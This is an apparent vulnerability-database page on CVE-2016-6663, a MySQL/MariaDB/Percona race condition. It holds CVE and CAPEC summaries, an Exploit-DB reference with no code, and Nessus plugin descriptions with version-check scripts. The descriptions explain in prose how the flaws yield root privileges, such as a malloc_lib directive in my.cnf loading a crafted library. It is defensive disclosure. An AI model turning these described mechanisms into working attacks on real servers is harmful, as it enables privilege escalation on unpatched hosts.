Vulnerabilities > CVE-2016-6663 - Race Condition vulnerability in multiple products
Attack vector
LOCAL Attack complexity
HIGH Privileges required
LOW Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Race condition in Oracle MySQL before 5.5.52, 5.6.x before 5.6.33, 5.7.x before 5.7.15, and 8.x before 8.0.1; MariaDB before 5.5.52, 10.0.x before 10.0.28, and 10.1.x before 10.1.18; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17 allows local users with certain permissions to gain privileges by leveraging use of my_copystat by REPAIR TABLE to repair a MyISAM table.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Leveraging Race Conditions This attack targets a race condition occurring when multiple processes access and manipulate the same resource concurrently and the outcome of the execution depends on the particular order in which the access takes place. The attacker can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance a race condition can occur while accessing a file, the attacker can trick the system by replacing the original file with his version and cause the system to read the malicious file.
- Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. The typical example is the file access. The attacker can leverage a file access race condition by "running the race", meaning that he would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the attacker could do something such as replace the file and cause an escalation of privilege.
Exploit-Db
description | MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition. CVE-2016-5616,CVE-2016-6663. Local exploit for Lin... |
file | exploits/linux/local/40678.c |
id | EDB-ID:40678 |
last seen | 2016-11-02 |
modified | 2016-11-01 |
platform | linux |
port | |
published | 2016-11-01 |
reporter | Dawid Golunski |
source | https://www.exploit-db.com/download/40678/ |
title | MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition |
type | local |
Nessus
NASL family Databases NASL id MYSQL_5_7_15_RPM.NASL description The version of MySQL running on the remote host is 5.7.x prior to 5.7.15. It is, therefore, affected by multiple vulnerabilities : - Multiple unspecified flaws exist in the Optimizer subcomponent that allow an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492, CVE-2016-5632) - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the Error Handling subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5617) - An unspecified flaw exists in the Packaging subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5625) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a last seen 2020-06-04 modified 2016-09-08 plugin id 93380 published 2016-09-08 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/93380 title MySQL 5.7.x < 5.7.15 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(93380); script_version("1.12"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/03"); script_cve_id( "CVE-2016-3492", "CVE-2016-5507", "CVE-2016-5616", "CVE-2016-5617", "CVE-2016-5625", "CVE-2016-5626", "CVE-2016-5629", "CVE-2016-5632", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-8283", "CVE-2016-8286" ); script_bugtraq_id( 92911, 92912, 93612, 93614, 93617, 93638, 93650, 93668, 93678, 93693, 93737, 93745 ); script_xref(name:"EDB-ID", value:"40360"); script_name(english:"MySQL 5.7.x < 5.7.15 Multiple Vulnerabilities"); script_summary(english:"Checks the version of MySQL server."); script_set_attribute(attribute:"synopsis", value: "The remote database server is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of MySQL running on the remote host is 5.7.x prior to 5.7.15. It is, therefore, affected by multiple vulnerabilities : - Multiple unspecified flaws exist in the Optimizer subcomponent that allow an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492, CVE-2016-5632) - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the Error Handling subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5617) - An unspecified flaw exists in the Packaging subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5625) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a 'malloc_lib=' directive pointing to specially crafted mysql_hookandroot_lib.so file and thereby cause MySQL to load a malicious library the next time it is started. (CVE-2016-6662) - An unspecified flaw exists that allows an authenticated, remote attacker to bypass restrictions and create the /var/lib/mysql/my.cnf file with custom contents without the FILE privilege requirement. (CVE-2016-6663) - An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition.(CVE-2016-8283) - An unspecified flaw exists in the Security: Privileges subcomponent that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2016-8286) - A flaw exists that is related to the use of temporary files by REPAIR TABLE. An authenticated, remote attacker can exploit this to gain elevated privileges. - A flaw exists in InnoDB when handling an operation that dropped and created a full-text search table. An authenticated, remote attacker can exploit this to trigger an assertion, resulting in a denial of service condition. - A flaw exists in InnoDB when accessing full-text auxiliary tables while dropping the indexed table. An authenticated, remote attacker can exploit this to trigger an assertion, resulting in a denial of service condition. - A buffer overflow condition exists when handling long integer values in MEDIUMINT columns due to the improper validation of certain input. An authenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. - An information disclosure vulnerability exists in the validate_password plugin due to passwords that have been rejected being written as plaintext to the error log. A local attacker can exploit this to more easily guess what passwords might have been chosen and accepted. - A flaw exists in InnoDB when handling an ALTER TABLE ... ENCRYPTION='Y', ALGORITHM=COPY operation that is applied to a table in the system tablespace. An authenticated, remote attacker can exploit this to trigger an assertion, resulting in a denial of service condition. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bac902d5"); script_set_attribute(attribute:"see_also", value:"https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html"); # http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?fbd97f45"); # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3235388.xml script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?453a538d"); script_set_attribute(attribute:"solution", value: "Upgrade to MySQL version 5.7.15 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-6662"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/06"); script_set_attribute(attribute:"patch_publication_date", value:"2016/09/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/08"); script_set_attribute(attribute:"agent", value:"unix"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mysql"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mysql"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Databases"); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled"); script_require_ports("Host/RedHat/release", "Host/AmazonLinux/release", "Host/SuSE/release", "Host/CentOS/release"); exit(0); } include("mysql_version.inc"); fix_version = "5.7.15"; exists_version = "5.7"; mysql_check_rpms(mysql_packages:default_mysql_rpm_list_server_only, fix_ver:fix_version, exists_ver:exists_version, rhel_os_list:default_mysql_rhel_os_list, centos_os_list:default_mysql_centos_os_list, suse_os_list:default_mysql_suse_os_list, ala_os_list:default_mysql_ala_os_list, severity:SECURITY_HOLE);
NASL family Databases NASL id MARIADB_10_0_28.NASL description The version of MariaDB running on the remote host is 10.0.x prior to 10.0.28. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the Security: Encryption subcomponent that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2016-5584) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - An unspecified flaw exists that allows an authenticated, remote attacker to bypass restrictions and create the /var/lib/mysql/my.cnf file with custom contents without the FILE privilege requirement. (CVE-2016-6663) - A flaw exists in wolfSSL, specifically within the C software version of AES Encryption and Decryption, due to table lookups not properly considering cache-bank access times. A local attacker can exploit this, via a specially crafted application, to disclose AES keys. Note that this vulnerability does not affect MariaDB packages included in Red Hat products since they last seen 2020-06-01 modified 2020-06-02 plugin id 95540 published 2016-12-05 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95540 title MariaDB 10.0.x < 10.0.28 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(95540); script_version("1.7"); script_cvs_date("Date: 2019/11/13"); script_cve_id( "CVE-2016-3492", "CVE-2016-5584", "CVE-2016-5616", "CVE-2016-5624", "CVE-2016-5626", "CVE-2016-5629", "CVE-2016-6663", "CVE-2016-7440", "CVE-2016-8283" ); script_bugtraq_id( 92911, 93614, 93635, 93638, 93650, 93659, 93668, 93735, 93737 ); script_xref(name:"EDB-ID", value:"40678"); script_name(english:"MariaDB 10.0.x < 10.0.28 Multiple Vulnerabilities"); script_summary(english:"Checks the MariaDB version."); script_set_attribute(attribute:"synopsis", value: "The remote database server is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of MariaDB running on the remote host is 10.0.x prior to 10.0.28. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the Security: Encryption subcomponent that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2016-5584) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - An unspecified flaw exists that allows an authenticated, remote attacker to bypass restrictions and create the /var/lib/mysql/my.cnf file with custom contents without the FILE privilege requirement. (CVE-2016-6663) - A flaw exists in wolfSSL, specifically within the C software version of AES Encryption and Decryption, due to table lookups not properly considering cache-bank access times. A local attacker can exploit this, via a specially crafted application, to disclose AES keys. Note that this vulnerability does not affect MariaDB packages included in Red Hat products since they're built against system OpenSSL packages. (CVE-2016-7440) - An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-8283) - A flaw exists in the fix_after_pullout() function in item.cc that is triggered when handling a prepared statement with a conversion to semi-join. An authenticated, remote attacker can exploit this to crash the database, resulting in a denial of service condition. - A flaw exists in the mysql_admin_table() function in sql_admin.cc that is triggered when handling re-execution of certain ANALYZE TABLE prepared statements. An authenticated, remote attacker can exploit this to crash the database, resulting in a denial of service condition. - A flaw exists in the fill_alter_inplace_info() function in sql_table.cc that is triggered when altering persistent virtual columns. An authenticated, remote attacker can exploit this to crash the database, resulting in a denial of service condition. - A flaw exists in the mysql_rm_table_no_locks() function in sql_table.cc that is triggered during the handling of CREATE OR REPLACE TABLE queries. An authenticated, remote attacker can exploit this to crash the database, resulting in a denial of service condition."); script_set_attribute(attribute:"see_also", value:"https://mariadb.com/kb/en/library/mariadb-10028-changelog/"); script_set_attribute(attribute:"see_also", value:"https://mariadb.com/kb/en/mariadb/mariadb-10028-release-notes/"); script_set_attribute(attribute:"solution", value: "Upgrade to MariaDB version 10.0.28 or later."); script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-6663"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/09/23"); script_set_attribute(attribute:"patch_publication_date", value:"2016/10/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/05"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:mariadb:mariadb"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Databases"); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("mysql_version.nasl", "mysql_login.nasl"); script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/mysql", 3306); exit(0); } include("mysql_version.inc"); mysql_check_version(variant:'MariaDB', fixed:'10.0.28-MariaDB', min:'10.0', severity:SECURITY_WARNING);
NASL family Databases NASL id MYSQL_5_6_33.NASL description The version of MySQL running on the remote host is 5.6.x prior to 5.6.33. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a last seen 2020-06-01 modified 2020-06-02 plugin id 93377 published 2016-09-08 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/93377 title MySQL 5.6.x < 5.6.33 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(93377); script_version("1.14"); script_cvs_date("Date: 2019/11/14"); script_cve_id("CVE-2016-5507", "CVE-2016-6662", "CVE-2016-6663"); script_bugtraq_id(92911, 92912, 93678); script_xref(name:"EDB-ID", value:"40360"); script_name(english:"MySQL 5.6.x < 5.6.33 Multiple Vulnerabilities"); script_summary(english:"Checks the version of MySQL server."); script_set_attribute(attribute:"synopsis", value: "The remote database server is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of MySQL running on the remote host is 5.6.x prior to 5.6.33. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a 'malloc_lib=' directive pointing to specially crafted mysql_hookandroot_lib.so file and thereby cause MySQL to load a malicious library the next time it is started. (CVE-2016-6662) - An unspecified flaw exists that allows an authenticated, remote attacker to bypass restrictions and create the /var/lib/mysql/my.cnf file with custom contents without the FILE privilege requirement. (CVE-2016-6663) - A flaw exists that is related to the use of temporary files by REPAIR TABLE. An authenticated, remote attacker can exploit this to gain elevated privileges. - A flaw exists in InnoDB when handling an operation that dropped and created a full-text search table. An authenticated, remote attacker can exploit this to trigger an assertion, resulting in a denial of service condition. - A flaw exists in InnoDB when accessing full-text auxiliary tables while dropping the indexed table. An authenticated, remote attacker can exploit this to trigger an assertion, resulting in a denial of service condition. - A buffer overflow condition exists when handling long integer values in MEDIUMINT columns due to the improper validation of certain input. An authenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. - An unspecified flaw exists due to how a prepared statement uses a parameter in the select list of a derived table that was part of a join. An authenticated, remote attacker can exploit this to cause a server exit, resulting in a denial of service condition. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bac902d5"); script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html"); # http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?fbd97f45"); script_set_attribute(attribute:"solution", value: "Upgrade to MySQL version 5.6.33 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-6662"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/06"); script_set_attribute(attribute:"patch_publication_date", value:"2016/09/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/08"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:mysql"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Databases"); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("mysql_version.nasl", "mysql_login.nasl"); script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/mysql", 3306); exit(0); } include("mysql_version.inc"); mysql_check_version(fixed:'5.6.33', min:'5.6', severity:SECURITY_HOLE);
NASL family Databases NASL id MYSQL_5_6_33_RPM.NASL description The version of MySQL running on the remote host is 5.6.x prior to 5.6.33. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a last seen 2020-06-04 modified 2016-09-08 plugin id 93378 published 2016-09-08 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/93378 title MySQL 5.6.x < 5.6.33 Multiple Vulnerabilities NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2016-2595.NASL description An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a newer upstream version: mariadb (5.5.52). (BZ#1304516, BZ#1377974) Security Fix(es) : * It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 95341 published 2016-11-28 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95341 title CentOS 7 : mariadb (CESA-2016:2595) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-0184.NASL description An update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616) last seen 2020-06-01 modified 2020-06-02 plugin id 96756 published 2017-01-25 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96756 title RHEL 6 : mysql (RHSA-2017:0184) NASL family OracleVM Local Security Checks NASL id ORACLEVM_OVMSA-2017-0035.NASL description The remote OracleVM system is missing necessary patches to address critical security updates : - fix date in the test - Fix (CVE-2016-6662, CVE-2016-6663) Resolves: #1397309 - Fixed reload_acl_and_cache Resolves: #1281370 - Add support for TLSv1.1 and TLSv1.2 - Fixed test events_1 (end date in past) Resolves: #1287048 last seen 2020-06-01 modified 2020-06-02 plugin id 96790 published 2017-01-26 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96790 title OracleVM 3.3 / 3.4 : mysql (OVMSA-2017-0035) NASL family Scientific Linux Local Security Checks NASL id SL_20161103_MARIADB_ON_SL7_X.NASL description The following packages have been upgraded to a newer upstream version: mariadb (5.5.52). Security Fix(es) : - It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) - A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes : last seen 2020-03-18 modified 2016-12-15 plugin id 95847 published 2016-12-15 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95847 title Scientific Linux Security Update : mariadb on SL7.x x86_64 (20161103) NASL family SuSE Local Security Checks NASL id SUSE_SU-2016-2932-1.NASL description This mariadb update to version 10.0.28 fixes the following issues (bsc#1008318): Security fixes : - CVE-2016-8283: Unspecified vulnerability in subcomponent Types (bsc#1005582) - CVE-2016-7440: Unspecified vulnerability in subcomponent Encryption (bsc#1005581) - CVE-2016-5629: Unspecified vulnerability in subcomponent Federated (bsc#1005569) - CVE-2016-5626: Unspecified vulnerability in subcomponent GIS (bsc#1005566) - CVE-2016-5624: Unspecified vulnerability in subcomponent DML (bsc#1005564) - CVE-2016-5616: Unspecified vulnerability in subcomponent MyISAM (bsc#1005562) - CVE-2016-5584: Unspecified vulnerability in subcomponent Encryption (bsc#1005558) - CVE-2016-3492: Unspecified vulnerability in subcomponent Optimizer (bsc#1005555) - CVE-2016-6663: Privilege Escalation / Race Condition (bsc#1001367) Bugfixes : - mysql_install_db can last seen 2020-06-01 modified 2020-06-02 plugin id 95383 published 2016-11-29 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95383 title SUSE SLES12 Security Update : mariadb (SUSE-SU-2016:2932-1) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2016-2595.NASL description An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a newer upstream version: mariadb (5.5.52). (BZ#1304516, BZ#1377974) Security Fix(es) : * It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 94558 published 2016-11-04 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/94558 title RHEL 7 : mariadb (RHSA-2016:2595) NASL family Databases NASL id MYSQL_5_7_15.NASL description The version of MySQL running on the remote host is 5.7.x prior to 5.7.15. It is, therefore, affected by multiple vulnerabilities : - Multiple unspecified flaws exist in the Optimizer subcomponent that allow an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492, CVE-2016-5632) - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the Error Handling subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5617) - An unspecified flaw exists in the Packaging subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5625) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker 